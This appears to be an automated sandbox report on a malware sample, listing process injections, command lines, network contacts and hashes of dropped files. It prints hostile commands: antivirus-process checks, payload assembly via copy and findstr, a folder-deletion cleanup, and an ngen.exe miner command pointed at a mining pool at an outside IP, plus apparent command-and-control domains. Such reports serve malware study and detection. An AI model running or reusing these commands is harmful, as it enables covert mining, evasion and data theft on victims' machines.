PID 2820 wrote to memory of 5112	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\CBGCBGCAFI.exe
PID 2820 wrote to memory of 5112	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\CBGCBGCAFI.exe
PID 2952 wrote to memory of 4924	N/A	C:\ProgramData\JKKEBGCGHI.exe	C:\Windows\SysWOW64\ftp.exe
PID 2952 wrote to memory of 4924	N/A	C:\ProgramData\JKKEBGCGHI.exe	C:\Windows\SysWOW64\ftp.exe
PID 2952 wrote to memory of 4924	N/A	C:\ProgramData\JKKEBGCGHI.exe	C:\Windows\SysWOW64\ftp.exe
PID 5112 wrote to memory of 2352	N/A	C:\ProgramData\CBGCBGCAFI.exe	C:\Windows\SysWOW64\ftp.exe
PID 5112 wrote to memory of 2352	N/A	C:\ProgramData\CBGCBGCAFI.exe	C:\Windows\SysWOW64\ftp.exe
PID 5112 wrote to memory of 2352	N/A	C:\ProgramData\CBGCBGCAFI.exe	C:\Windows\SysWOW64\ftp.exe
PID 2820 wrote to memory of 2072	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe
PID 2820 wrote to memory of 2072	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe
PID 2820 wrote to memory of 2072	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 4032	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 2072 wrote to memory of 4032	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 2072 wrote to memory of 4032	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 2952 wrote to memory of 4924	N/A	C:\ProgramData\JKKEBGCGHI.exe	C:\Windows\SysWOW64\ftp.exe
PID 5112 wrote to memory of 2352	N/A	C:\ProgramData\CBGCBGCAFI.exe	C:\Windows\SysWOW64\ftp.exe
PID 4924 wrote to memory of 1428	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\SysWOW64\explorer.exe
PID 4924 wrote to memory of 1428	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\SysWOW64\explorer.exe
PID 4924 wrote to memory of 1428	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\SysWOW64\explorer.exe
PID 2352 wrote to memory of 4024	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2352 wrote to memory of 4024	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4924 wrote to memory of 1428	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\SysWOW64\explorer.exe
PID 2352 wrote to memory of 4024	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2352 wrote to memory of 4024	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4024 wrote to memory of 2608	N/A	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (10).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\ProgramData\JKKEBGCGHI.exe

"C:\ProgramData\JKKEBGCGHI.exe"

C:\ProgramData\CBGCBGCAFI.exe

"C:\ProgramData\CBGCBGCAFI.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEBKECFCFBGC" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi	udp
US	52.111.227.14:443		tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
GB	172.217.169.67:80	c.pki.goog	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	8.8.8.8:53	73.144.22.2.in-addr.arpa	udp
US	8.8.8.8:53	67.169.217.172.in-addr.arpa	udp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	172.67.212.123:443	businessdownloads.ltd	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	199.232.192.193:443	i.imgur.com	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
FI	135.181.22.88:80	135.181.22.88	tcp
FI	65.109.127.181:3333		tcp
US	45.152.112.146:80	proresupdate.com	tcp
US	172.67.197.250:443	contur2fa.recipeupdates.rest	tcp
FI	65.109.127.181:3333		tcp
US	172.67.197.250:443	contur2fa.recipeupdates.rest	tcp
FI	65.109.127.181:3333		tcp
FI	65.109.127.181:3333		tcp
FI	65.109.127.181:3333		tcp
N/A	224.0.0.251:5353		udp
FI	65.109.127.181:3333		tcp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat

MD5	7f01361524f94ccde5107595e2c54200
SHA1	c1b34c5781d2f042c81c3a8128d2a9d5b7b7a084
SHA256	903bedd93e8ec45d8083f33181b8f64612c075bfddf55fc4fb5a5443f5c578dd
SHA512	bb19216799526c5c7f2bf1f29e529d63c2cd6f6cef0c9e3b236a8e90d836a655d0eb7f62a9aa91dcf8f1c8d8f0ea9753252a5e54f49768315844847196dae064

C:\Users\Admin\AppData\Local\Temp\Cologne

MD5	a7e0c610d9e51e1f07ed50a2698d841c
SHA1	856bf97f63d5b1629a73def5b539454e2bdf0925
SHA256	4458046d4cefd31f95c9844044f68b7fc95311a5e25d085a2882c6426d07977d
SHA512	60ab445f726323b9ea37eb328015dbf752065f9091d4ef19ccdf3c567e0ae731ba633a78334e245b7b5219f1580ccf8dc7790084255ae8bf143a559cbf11adc6

C:\Users\Admin\AppData\Local\Temp\Race

MD5	677c8b24ad59b6eef5dfb3faf7e0974a
SHA1	6e52ce41957b616aff5481493c30b7d84090a562
SHA256	b2f80e63c5e1073731a4656fa3e6d23d6cb7dd43d70ebea566b6bee00fee9bfd
SHA512	e013f8d3bbe9ebbf25635efb17d3554056c8318af4908825820dab0393d4ac9a26de55e4f168ba0cc84294a657680887b74b59d2b15c340b9a990021f6269c7a

C:\Users\Admin\AppData\Local\Temp\Reasons

MD5	99f7825b887660ea8f043d913522545b
SHA1	f6d36f0385ec836a40572bfcf605c8905b1a600a
SHA256	61ca2c5de8554fd7afe374c06203ea7832fdfff03f6512ef637328c66a6091a9
SHA512	ff1b9ff9aecf55b35c817e49adc0f580a45875976c462d03984eba97f93d57650da7724b42c2105eac0579c865c204e776ef762d984600c7e96fc574ace28cd2

C:\Users\Admin\AppData\Local\Temp\Estates

MD5	e3b5843f44d2382246054ea8b0706383
SHA1	a3036166a029bb1975129896e091daf40d820999
SHA256	2a790ae2e21ecf6c83b670a22509aeeca5a3ba67698cdd534817ff6e49957a84
SHA512	eac7c2bc9bfa0ad36a112b0f6878af59f9d6644e5f98842f069e741165d48d5c393790d939725c2d11606609a63ba1983c60753c3c9c4c4c273d49788190e2f8

C:\Users\Admin\AppData\Local\Temp\Changed

MD5	a2d24d16e1b5a0972e95b39e1d9a251b
SHA1	a5f7c2bcbbffef058fafe1b62c3825ce26ea5ed6
SHA256	c56805d59fc6c67afb039850fb018d90ee11ccdbecf6f7db0880f0d29e5e2a07
SHA512	8203f0ca64e37f40c923216a09216387ba9e0ef35fac7b3df1b409216ae8b4b85fb178d0622482ce04ac1cba68af938c75272b31ca3a740a1061103785e4cfad

C:\Users\Admin\AppData\Local\Temp\Lake

MD5	5ef48073ad8953dbc25cb95852577d58
SHA1	da11413d729915a120e16e15c47201ad1afd7157
SHA256	30c013ba41821acae05a5359ce75857ca66cdb03adf4560c6c0aaf2eff7b19a8
SHA512	172afe33b31994af02e8e3d13ca5a285d8869671d00fecd8e147dde26eb8e493cafbae9a60f6ef49eac8221a0e1176e625043539b2b321a934647539ae22d00d

C:\Users\Admin\AppData\Local\Temp\Timeline

MD5	3876d86dce4359c2e28a693d2c24577f
SHA1	373222b9a4d6f9116feac281725156f024a464fc
SHA256	30286f45ff66b72cc1a5c493442f5c57c0f2c7d729f663793c57c3b8dba4cf4d
SHA512	9289622b7e57f1ce380d41073ab42dc4376d3c156d8b82f60d166650a138c6190cf98ae35002ae11f5b31926dd92f3de3724d77f9e4ed2427151794a9b03fe7e

C:\Users\Admin\AppData\Local\Temp\Then

MD5	33271f00b044ed98071d84807c2158c8
SHA1	392e6351a844de7b50be3486db834321f625b7e1
SHA256	eaab5d35bea196961ffb36b423caed9d42a6cdf723759a67d5c865db6d906eb1
SHA512	0cc39c715573a5b2e81621e83dcdaa09b29530e044be223e0b62913aa77940f196429845fca46e0838781eecd6accacb7083b95bccf60f9f3fff37d096f8a788

C:\Users\Admin\AppData\Local\Temp\Fx

MD5	dfedbc594137615c08a79052a8f79e4b
SHA1	164812d22a6559b86883089a2b5b3cb2d97c320f
SHA256	7e2d5e98eefd6cc1fa44a4dda125c2d986ff0bd6b6af488213bc4992d3d6ee6e
SHA512	0ebd7c128464eaae4ba196a45201c646e669021f7a2005aa04471b521373474cc3dd8df55792585fd92bdbd6297a0fb31af18e72111fd8aa3bf39113bcb29235

C:\Users\Admin\AppData\Local\Temp\Vintage

MD5	278bae85379affaab937d9ec59eaa46d
SHA1	badcf501ff87624a68efb1ec3340d6314cc00027
SHA256	ae74ce2e63b5570786913b7f18c8bb79cd3f89d8a944a308ab036b39d7904edc
SHA512	9bfc82782f6318d4176f7fa7adad68d44421c76c179f5777e739f837d9ba5300453fbd9a1368eccbeccc24da9d1700db81f2128fde49547ed2ca86f1824ad391

C:\Users\Admin\AppData\Local\Temp\Destiny

MD5	ae51ee350f9b67d464fef7951cefe7ef
SHA1	109023e02149e2282322d285c00810a1cef0e3de
SHA256	658b597ecc79cf8cae6883b1bd37c014da410731d9ec9774b2952e8d9041793e
SHA512	bf84d806d2c10b331af8a195b654eaf7049c252db9120f72aff28cf263727b88fb432bb05f911afca7509c485f8df5b1c162ec91e4b88c76f0c19eb99f080f99

C:\Users\Admin\AppData\Local\Temp\Fighting

MD5	4a5d107b42961c4cc01ff0699b64629a
SHA1	6c31783eb1a0cf760515c21b2218f905f387c3cc
SHA256	04929738eb9987535c773a0ad904049369bc81fa6e36a35d3ff38e26d53cd696
SHA512	57dc197b44971214b61942b019609011c699f7f22972660e7f5d37e7e5cd2102501ae5d5f7b6e9031074cf9a730fbc8f128340dc640344996d0d34886f1e6b72

C:\Users\Admin\AppData\Local\Temp\Travelling

MD5	528985f09d3b53a80e38911b2086f45b
SHA1	8c2c8183f0883132dfe3d61a8afa5726cec9fefa
SHA256	79b144d737cbb862203146276c32deddcee0dcbe726cc877f40f0b0348a7f502
SHA512	1e661cf38f15abd8a852c01a1605eb19da137d8fb738885c72853c624066f1350cdb98205d3ed29ae286f4463dff2dca2881dddef8f7ac3ac6a9a017d8e7e842

C:\Users\Admin\AppData\Local\Temp\Flyer

MD5	9aec66d230b5a002f8e58e7c86fd5d11
SHA1	4486447e1c450f4c687ccef10433c428dd3e31d4
SHA256	0c8303cb00fe2838fbc27ffd8af0a0fc00045ce54efa40911b50f4e828edf1d6
SHA512	752119a11a7440a63602e77fa229d741078e3117b6e461b0d383a23f5059d0aef7b629eaf90abf5f2522997d0abab06e81bf258e8f823c22ce832fdb737e1fcc

C:\Users\Admin\AppData\Local\Temp\Worry

MD5	c715434dab2f93f0d1b6680c2b01b3fc
SHA1	355ea26f3a52b2c9abb457b9c56177a229cf9421
SHA256	05ddf26b6a74f039743ffd1d4d6152b8aa0add24da17aece71f9ccaa60538c4c
SHA512	7d39bf5a5362dd4d7ee51f4c963eb55cfdd3da46db093e288cec3db71c8b1bfaa304a64e539524fb62c397cd0a27c0890f3c93db4b591a84360bd47f23bfbc6a

C:\Users\Admin\AppData\Local\Temp\Lol

MD5	ac4c86188160adc4ea28ea1505dc18bb
SHA1	7e22e3f0d2d0aa2235b613df0413a73324dff760
SHA256	8d73e871d375f3802510b5212aba0e8ef929d62ed0396367cd3838ca7494b5b5
SHA512	a4ff143709eaddd00cd1062c940d051606039657722cc0944886a59282b8eaafed47004dcb90bf315f53acedfbdb93935fc49c2d2cf674870211854ca10b2692

C:\Users\Admin\AppData\Local\Temp\Overnight

MD5	fb39a9bcb79f50bd7cd171f3c9325b96
SHA1	922d750974483d7ae4e40d873b1124835d6a865a
SHA256	04d5051668e69769a85b314d0c46556755dd11182c2982c5fac2792d62f152c0
SHA512	fe2ebb8412e8df722c0f8fd8682198654ad19707525f8bf2068d18104163e809621fef079f8f2cb6176e9897a764816144187c2b6214d2406e6a30e581d556d7

C:\Users\Admin\AppData\Local\Temp\Fails

MD5	723321b7b3b33a2788e6cc0ba336c76d
SHA1	e17eb7189561d7f8b4fab76014124b780a3da4d7
SHA256	db1674bcd78442305a1a79773d17b61a6c5bbf830ce8e4983164c1f56198236a
SHA512	dd3c229f3b36cb07222663b8becac13df8d3a68874aee73ad20b11e18591085664ff9df27e9d84d9e9eedc00cc206db975049650f37d11bb666f1d690029c35e

C:\Users\Admin\AppData\Local\Temp\Impacts

MD5	315afae2384177766854966d0c39ead0
SHA1	baa183ea390760a631723c2f1494e0af8fb391e0
SHA256	229d27cf367f7844bdc9da75bcffc7c68a8b71aa1a31dd819f5ee4fe3bc42767
SHA512	384d2d0926af3ac4355461dd01e248d82b7f55a1a851d18c5ba892ba987472c13e8036e9e1a11806c8501595d19bc753290121903aa51d345af62381f6b815ab

C:\Users\Admin\AppData\Local\Temp\Therefore

MD5	cc32e2964f235bf9bddd71d4f7d3a9e2
SHA1	a570733cfce8d135315e86473b0ac6f6b4a4e763
SHA256	ec7c44500d11213688b83a04fb95c52b0d2c3ed2cc28d8d7e604f5b9336852f4
SHA512	3c3bea9699b4904e949c71ea40e72f39824837a9ed5251d1e1b5b857642bb2d6816c5d125255bb9272f599dd14d594fa820dacf22e8f72df424a419942e9ff8b

C:\Users\Admin\AppData\Local\Temp\Venezuela

MD5	47d9d9cdad725675c2dfa55ed4717db6
SHA1	d7bc49f9fae903accddf2da620dc5b9668f35dce
SHA256	d4be1b5210a95583cc8617ab58b5947b46abaf4f000960abcc774eee20751210
SHA512	4e12b065fc581460d137a0aebdffd3d56cfaf82b4d8be81bdfc3d4daf0897eda2230ab05166b35928b0b3c2f2cf0fb751ace6109b400d107a89797fefb5cf34e

C:\Users\Admin\AppData\Local\Temp\Ensures

MD5	5abe66470ddba2d1adc1ea359fb58b7d
SHA1	b914707d1f1b1c16dc03470cd8737a889292796c
SHA256	fecefcaab4d2499057061a01c13c3ec834ec4fcf13188e8708ad33cc3a6c6cb8
SHA512	5f95116f3f91ce9ed5d084e2c7b9df62892a633b3f45c3b714be8c34d39258d401e189297e49e15e8f497b88c2677f089473cd60e2e4806647fb7fc83471c0e2

C:\Users\Admin\AppData\Local\Temp\Noticed

MD5	90ab924a6bc6d90d922308452ce5c128
SHA1	4fd74c170817b9685b9230625fe7e47d54473829
SHA256	2ebfcd2eeaf8bc9561a1310ddc51e8759859e6523d0e8c73bb06969368ef88b2
SHA512	e93e506184d2b57abeb9601968bb0f53a06f78e8d08d3a5b5fd9f8b56a1e8709b2a48d3372e0a5d5152902a294c3b201176b35f60f7d4ee2636e15e0ca99b740

C:\Users\Admin\AppData\Local\Temp\Controversial

MD5	b8d54a8f7a866ce5950c2c67b18343ee
SHA1	95f12fbd6244ea3ecee9795ebd984a97bd056ef7
SHA256	8205f767c8dd7bb85316fe3f1988225c4bab822b39c03c412473f63f7fadddae
SHA512	1679d376069aab604f9c483623f1f7d53ca3792fa6dddb214360690186ec39662807149a7e525d797ee89d80bf742fb51a59beb0e053c4187b661bd8c954a164

C:\Users\Admin\AppData\Local\Temp\Expects

MD5	f9c59716c76e0d9aea1ed33432d0c0eb
SHA1	e017af5635025c7a5dddd5879e19f0e56cee5f63
SHA256	26deadb528299fc9567030e170fd608190da63a2cc0b8869565e4706329aee9b
SHA512	c24d790ae2ce1a66a5c9fd7eb15317cc25a2e16d28996eab7b46bea52b842ae20fcfc934edad5b70d8a0b66350db587057f346ca534e4b97fbb805693c6def61

C:\Users\Admin\AppData\Local\Temp\Banners

MD5	3f96912bd26122377de90bdf2b2adb43
SHA1	355135ae39c67bc1e8a34962db066b2d4862df22
SHA256	1025adb658535b34a6b1b162708f1d829e332bf7dfda6e389c5b676d2057b881
SHA512	6942ce7a6a09eaa4e4f897935d472d8a50cdc822d820e978eba449207ae42b65c86f5374226e4c1957ef9f8a7b3c26dfcdf45ec69edae9ce51173a0822c08174

C:\Users\Admin\AppData\Local\Temp\Tactics

MD5	2c9654e874efe5146131ed5422a715d9
SHA1	0e6d5c61f2b4821da4ecedd2a59eb6b023daa0e3
SHA256	2b35604cd27e82644be51f3266054f35b2415dd65abaa7b9b34f329fa14038e6
SHA512	bfba8ba24bc24899718d2d0b1f8948c1899c41b00624493bbd9a7c253cdee44a0f6e28d5db33473dafc3dbe6367fbdca2c062ea9cf21a15ef7ea53de8ce71c05

C:\Users\Admin\AppData\Local\Temp\Voice

MD5	c01790f3cef20061f828578069162760
SHA1	72a450b13fd37f6c5c95d94240c51354316d5962
SHA256	328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b
SHA512	4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

C:\Users\Admin\AppData\Local\Temp\Exception

MD5	2b79f9677d8663ccff67fbe4677a5065
SHA1	f63cbee04c6ae82b0f9ebaeeed8fbce7be51e7ed
SHA256	7b70774cca90f24dc9e1b889b6e277961ed7b61ed4cd8dbdd4642c65cb9b1ba9
SHA512	ce31599996e45e5aeb04b7d51e510711303471e85520986c91c4eac61a843c3d8e2b70851a1a6df0bf4b0825d417ac0b1b70822e93ab8f9523414effbef93619

C:\Users\Admin\AppData\Local\Temp\Abroad

MD5	6d4062e0f673dbe0a06ec227fe515c62
SHA1	c35c0ed445442d405ccfc78a20bbb86cf97526f6
SHA256	4e1c30452e317b04199626e8b7ca7f3b2c0c6b275715b1832533fcec030b72f4
SHA512	df953dbdb117c7ef3dbfcd266dee839f9a1ca4d50924f86d9620d0ca7a7fc9e3059caa955251e2327d46571ceb0b79dc53a2fef5b4b4f829ba33c436f982a921

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

MD5	b06e67f9767e5023892d9698703ad098
SHA1	acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256	8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512	7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2820-210-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-211-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-213-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-222-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-223-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-244-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-224-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2820-245-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-261-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\mozglue.dll

MD5	c8fd9be83bc728cc04beffafc2907fe9
SHA1	95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256	ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512	fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\AEBKECFCFBGC\nss3.dll

MD5	1cc453cdf74f31e4d913ff9c10acdde2
SHA1	6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256	ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512	dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/2820-262-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-284-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-285-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\JKKEBGCGHI.exe

MD5	6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1	424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256	376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512	d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/2952-308-0x00000000003D0000-0x00000000008E3000-memory.dmp

C:\ProgramData\CBGCBGCAFI.exe

MD5	daaff76b0baf0a1f9cec253560c5db20
SHA1	0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256	5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512	987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

C:\Users\Admin\AppData\Local\Temp\9513dacd

MD5	8d443e7cb87cacf0f589ce55599e008f
SHA1	c7ff0475a3978271e0a8417ac4a826089c083772
SHA256	e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512	c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2952-325-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/5112-324-0x00000000002F0000-0x0000000000538000-memory.dmp

memory/2952-330-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\968516cf

MD5	c62f812e250409fbd3c78141984270f2
SHA1	9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256	d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512	7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/5112-332-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/5112-333-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

memory/2820-337-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-338-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-354-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-355-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-359-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-360-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\AFCFHD

MD5	59071590099d21dd439896592338bf95
SHA1	6a521e1d2a632c26e53b83d2cc4b0edecfc1e68c
SHA256	07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541
SHA512	eedb6cadbceb2c991fc6f68dccb80463b3f660c5358acd7d705398ae2e3df2b4327f0f6c6746486848bd2992b379776483a98063ae96edb45877bb0314874668

memory/2820-376-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-377-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\CFCBFB

MD5	6aee27de60df6d69937711649fc76529
SHA1	1f6604181bce033570620eae597692103a361542
SHA256	08711ae93c31bf7c7839f92f98fc35a3369238e1e1d3331db1b2ee18bc8af164
SHA512	e298f74efc35a57812c6d69c203f54698d528410cebd9eea3044802c2b4a15860b965daf5b71c343733386abb961f73df6ce60224b88643261abf0c7814b72ec

C:\ProgramData\AEBKECFCFBGC\KJEGCF

MD5	3f50a5b944f34447d367a5a8cff2202c
SHA1	1470119d2911daec46655258de736bec57fd64d3
SHA256	a2802ce60a24ff018322f342908e349910992c82d083a304e332fd0be7ae9e2c
SHA512	5a37ef0c319009f4a21d5aa11621d769a90545ec18fbbc1cd849bed3132a4eeb46c334cd11afbf1ad213f2718c94d3e76695b459def87590c769db88c5aea286

memory/2952-390-0x0000000071FF0000-0x000000007216D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\974d65ea

MD5	c091dabb88d6c3eaa5aace99ab406b1c
SHA1	df7944e6d41b22e43f7df232a04dbc606c9be323
SHA256	d0aa929f19420e20ce33c14cb9f46ffb72256b68533a3c18ff7d542d9fd0c079
SHA512	8d7dceb9ab4fd2db532ce05ae6c056a3f95abca36740b837b032f769439595a7ac2090ec43c5bc7dd4b9f11f45212e50217890b0723169b74b196ef2fa13482b

memory/5112-393-0x0000000071FF0000-0x000000007216D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\99a4a992

MD5	8f7d74c8333c1b195ac28403a7ea7d14
SHA1	9df6d527f87b4a1a144292a93f272d9d7ff801e6
SHA256	d4d0af00988b957054d5945dc0f3bca6df2dcc0a6b349f2ca8207cd7f9705dbf
SHA512	e5124d4c3edaef68aec786b53b16cc60b32a12684cc2e96985dc2dd1efc5dbc094aaf2adc81a97f5435d479e139769c38e6319035e9639fe05bbe10712df92c9

memory/4924-396-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

memory/2352-397-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\VCRUNT~1.DLL

MD5	a37ee36b536409056a86f50e67777dd7
SHA1	1cafa159292aa736fc595fc04e16325b27cd6750
SHA256	8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512	3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\AEBKECFCFBGC\softokn3.dll

MD5	4e52d739c324db8225bd9ab2695f262f
SHA1	71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256	74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512	2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\AEBKECFCFBGC\msvcp140.dll

MD5	5ff1fca37c466d6723ec67be93b51442
SHA1	34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256	5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
